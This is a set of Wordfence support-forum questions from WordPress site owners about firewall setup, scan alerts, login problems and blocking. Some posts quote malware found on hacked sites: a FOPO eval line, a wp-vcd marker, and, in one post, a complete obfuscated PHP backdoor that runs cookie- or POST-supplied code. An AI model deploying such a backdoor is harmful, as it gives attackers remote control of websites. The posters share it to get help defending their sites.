Replies: 0
Hello,
So, I’m trying to set up my wordfence firewall – and I’m getting the following error:
We were unable to create the wordfence-waf.php file in the root of the WordPress installation. It’s possible WordPress cannot write to the wordfence-waf.php file because of file permissions. Please verify the permissions are correct and retry the installation.
I read something about permissions; I see what my permissions are but, I’m not sure what I’m supposed to do with that.
Replies: 0
Hi,
I use Wordfence on several sites and I noticed that there’s only one way to activate the firewall extended protection. Before something I could not identify, the code lines in the htaccess file php_value auto_prepend_file 'path-to-waf.php' were working just fine.
Now I need to add the ‘path-to-waf.php’ inside the cPanel PHP options page otherwise I can’t get the extended protection to work. I was wondering why this change in behaviour occurred, if you had any idea at all?
I checked the entire doc regarding Firewall Optimization and troubleshooting but so far, nothing I tried worked. Is there a log somewhere I could look at to find what is the blocking part of the process?
Thanks for your help!
Replies: 0
Hi!
Wordfence is reporting the following on many files of this plugin…
Filename: wp-content/plugins/xyz-wp-smap/admin/add-account.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: $debcfb4e=”\142\x61\163\x65\x36\x34\137\x64\145\143\157\144\145″;@eval($debcfb4e(The issue type is: Typical first line of obfuscated code from FOPO
Description: A backdoor known as FOPO.A
Is my client’s site hacked?
Replies: 0
Hello. I did a scan with WordFence plugin and it showed that I have 9 files with CRITICAL status. I have options to repair some of them or delete the others. But I am scared to do anything because it might hurt my website (I don’t know much about WordPress codes).
Example of the file:
File appears to be malicious: wp-content/themes/jannah-NULLED/functions.php
Type: File
Issue Found 31.01.2019 10:53
Critical
IGNORE
DETAILS
Filename: wp-content/themes/jannah-NULLED/functions.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: $div_code_name=”wp_vcd”;
The issue type is: Backdoor:PHP/wp-vcd
Description: Backdoor used for backlink injection and other malicious activity.
What should i do with it? Delete or not?
Screenshot: https://ibb.co/PMSsQLX
Replies: 0
I manage about 50 websites. Starting early Jan 31 there was a huge increase in login attempts on most of the sites. One common user name that was attempted is “indoxploit”.
The sites are configured to “Immediately lock out invalid usernames”, but that didn’t seem to be happening. The login attempts were logged as a yellow type “Type: Failed Login” rather than the usual “Type: Blocked”.
My question is why would these attempts not be blocked?
Replies: 0
Hello,
I’m logged into my dashboard, on the WordFence tab. When I click “5 issues found in most recent scan”, I am taken to the wp-login screen. I re-enter my credentials, and I’m suddenly in an infinite login loop. If I hit back arrow, I can’t access any of the tabs on my left menu bar, they all send me through and infinite login loop. If I click “plugins” or “pages” or anything, I get taken to a login screen and endless login loop.
If I go in through FTP to plugins folder and disable the WordFence plugin, all functionality is restored.
I’d like to keep using WordFence, do you have a suggestion or an idea as to what would be causing this issue for redirect login loop? Thank you!
Replies: 0
Suddenly I get this error on every page – Front & back end:
Fatal error: Uncaught wfWAFStorageFileException: Unable to verify temporary file contents for atomic writing. in /wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php:47 Stack trace: #0 /wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php(650): wfWAFStorageFile::atomicFilePutContents(‘/home/u37315p32…’, ‘<?php exit(‘Acc…’) #1 [internal function]: wfWAFStorageFile->saveConfig(‘livewaf’) #2 {main} thrown in /wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php on line 47
Also:
A plugin was updated and Wordfence said files were changed. Duh…
What is going wrong?
Replies: 0
My self hosted WordPress had two unknown plugins (antisp and injectbody) avtivated before I updated to WP 5.0.3 and installed Wordfence today. They both contained a single php file and a txt file with some obfuscated convoluted javascript.
I zipped them and uploaded them to TinyUpload.com:
http://s000.tinyupload.com/?file_id=04615023738757663951
Are they harmfull?
Should Wordfence have detected them?
/Mogens
Replies: 0
All my WordPress clients was hack and here are the most common flags that wordfence found.
wp-content/plugins/mrx/r.php
Cwd.php
where can I find information about this?
How did they get in all my clients website?
Thanks
Replies: 0
Hi. I see with wordfence it is impossible to change the url of the login page. Is it always the case ?
I see in many websites that it is very important to change the url of the login page. Securepress integrate this option. Thanks
Replies: 0
Hi,
This morning i got mails from wordfence on all random client sites.
they are always 1 file in the root directory next to wp-content wp-admin folders with a random name in those files there is always the same code:
<?php
$dktlpum = '-acn_6k4vebugy#\'i2mx98*lp5H0sto1frd';$ziwqkq = Array();$ziwqkq[] = $dktlpum[32].$dktlpum[7].$dktlpum[31].$dktlpum[17].$dktlpum[25].$dktlpum[21].$dktlpum[7].$dktlpum[9].$dktlpum[0].$dktlpum[2].$dktlpum[9].$dktlpum[27].$dktlpum[5].$dktlpum[0].$dktlpum[7].$dktlpum[5].$dktlpum[10].$dktlpum[7].$dktlpum[0].$dktlpum[10].$dktlpum[31].$dktlpum[32].$dktlpum[10].$dktlpum[0].$dktlpum[1].$dktlpum[34].$dktlpum[21].$dktlpum[2].$dktlpum[31].$dktlpum[9].$dktlpum[25].$dktlpum[20].$dktlpum[17].$dktlpum[25].$dktlpum[7].$dktlpum[9];$ziwqkq[] = $dktlpum[26].$dktlpum[22];$ziwqkq[] = $dktlpum[14];$ziwqkq[] = $dktlpum[2].$dktlpum[30].$dktlpum[11].$dktlpum[3].$dktlpum[29];$ziwqkq[] = $dktlpum[28].$dktlpum[29].$dktlpum[33].$dktlpum[4].$dktlpum[33].$dktlpum[9].$dktlpum[24].$dktlpum[9].$dktlpum[1].$dktlpum[29];$ziwqkq[] = $dktlpum[9].$dktlpum[19].$dktlpum[24].$dktlpum[23].$dktlpum[30].$dktlpum[34].$dktlpum[9];$ziwqkq[] = $dktlpum[28].$dktlpum[11].$dktlpum[10].$dktlpum[28].$dktlpum[29].$dktlpum[33];$ziwqkq[] = $dktlpum[1].$dktlpum[33].$dktlpum[33].$dktlpum[1].$dktlpum[13].$dktlpum[4].$dktlpum[18].$dktlpum[9].$dktlpum[33].$dktlpum[12].$dktlpum[9];$ziwqkq[] = $dktlpum[28].$dktlpum[29].$dktlpum[33].$dktlpum[23].$dktlpum[9].$dktlpum[3];$ziwqkq[] = $dktlpum[24].$dktlpum[1].$dktlpum[2].$dktlpum[6];foreach ($ziwqkq[7]($_COOKIE, $_POST) as $hmhqai => $qytazij){function ewsseq($ziwqkq, $hmhqai, $yvrmg){return $ziwqkq[6]($ziwqkq[4]($hmhqai . $ziwqkq[0], ($yvrmg / $ziwqkq[8]($hmhqai)) + 1), 0, $yvrmg);}function nzeynw($ziwqkq, $zclzhc){return @$ziwqkq[9]($ziwqkq[1], $zclzhc);}function shkbbo($ziwqkq, $zclzhc){$ocggwz = $ziwqkq[3]($zclzhc) % 3;if (!$ocggwz) {eval($zclzhc[1]($zclzhc[2]));exit();}}$qytazij = nzeynw($ziwqkq, $qytazij);shkbbo($ziwqkq, $ziwqkq[5]($ziwqkq[2], $qytazij ^ ewsseq($ziwqkq, $hmhqai, $ziwqkq[8]($qytazij))));}Any idea what this is?
How did they get this file there?
What should i do?
Replies: 0
Is there a way to disable or postpone notification settings?
Specifically plugin needing upgrade:
* The Plugin “Classic Editor” needs an upgrade (1.3 -> 1.4).
As you probably know most installer & etc support auto plugin upgrade which I utilize. So this issue is not really an issue to me, but I still get notification every time plugin gets updated, which is about everyday… 🙂
Is there a way to either ignore this alert or better yet, WAIT 48 hours before notifying about the plugin update? since typically it’ll be auto updated within 24 hours?
Thank you.
Replies: 0
Hi,
How does wordfence block an IP? does it add them to the htaccess file? If not how does it work?
Jonny
Replies: 0
Hi,
Since last week, Wordfence suddenly blocks my VA from logging into my site. She can’t even get to the login page. I didn’t change anything and the update was before that so I’m not sure what could cause this?
Thanks
Replies: 0
Hi,
What is Safari in IOS doing compared to Firefox on Android when visiting a website.
Screen Shot :
https://snag.gy/DE7g0W.jpg
Screen shot shows Safari looking for files that Firefox doesn’t.
So Safari gets blocked, wheres the Firefox user is happy to browse.
Is this a Wordfence issue or Safari doing what it thinks is best?
Cheers
Replies: 0
What is the best way to block all IPs to admin login EXCEPT specified ones?
Replies: 0
Hi there,
I get an non-admin login alert when a customer logs into their WooCommerce account. Is this normal and if so is there a option to turn it off?
Thanks
Edit: Actually i think i found the setting. Is this the one i would need to turn off:
Alert me when a non-admin user signs in
Replies: 0
Hi there,
I’m new to WordFence and can’t seem to find any clarification on the wording of an alert I received; “Blocked for a Malicious File Upload in file:”. Does this mean the IP was blocked and the file wasn’t uploaded or that the file was uploaded and then the IP was blocked?
Thanks!
Replies: 0
Hi,
Over at UpdraftPlus (> 2 million active installs), in our ticket system, we’re getting a plague of identical reports of Wordfence wrongly flagging an included file as containing a malicious virus.
The file is this one, and the string flagged as malicious is part of the test RSA key, so clearly a false positive: https://github.com/phpseclib/phpseclib/blob/master/tests/Unit/Crypt/RSA/LoadKeyTest.php
Can Wordfence not implement some omissions of easy-to-discover false positives like this? e.g. Run your own scans on the top
100 most-installed WordPress plugins and exclude known false positives so that they’re not reported zillions of times in other plugins’ support channels? It would save a lot of wasted man-hours of your own users and allow them to focus on real work instead.
David
Replies: 0
Hello,
I have installed Wordfence on my website yesterday, and got 3 error messages this morning:
Unknown file in WordPress core: wp-includes/load.php.orig
Type: File
Filename: wp-includes/load.php.orig
File Type: Core
Details: This file is in a WordPress core location but is not distributed with this version of WordPress. This is usually due to it being left over from a previous WordPress update, but it may also have been added by another plugin or a malicious file added by an attacker.
Unknown file in WordPress core: wp-includes/functions.php.orig
Type: File
Filename: wp-includes/functions.php.orig
File Type: Core
Details: This file is in a WordPress core location but is not distributed with this version of WordPress. This is usually due to it being left over from a previous WordPress update, but it may also have been added by another plugin or a malicious file added by an attacker.
Unknown file in WordPress core: wp-admin/includes/upgrade.php.orig
Type: File
Filename: wp-admin/includes/upgrade.php.orig
File Type: Core
Details: This file is in a WordPress core location but is not distributed with this version of WordPress. This is usually due to it being left over from a previous WordPress update, but it may also have been added by another plugin or a malicious file added by an attacker.
My website does not appear to be different today, and it is not indexed yet (work in progress). WordPress was updated at least once in the last week, since I started with a fresh installation. Could that be causing the problem?
What should I do with these three files – is it something to be worried about?
Thank you in advance!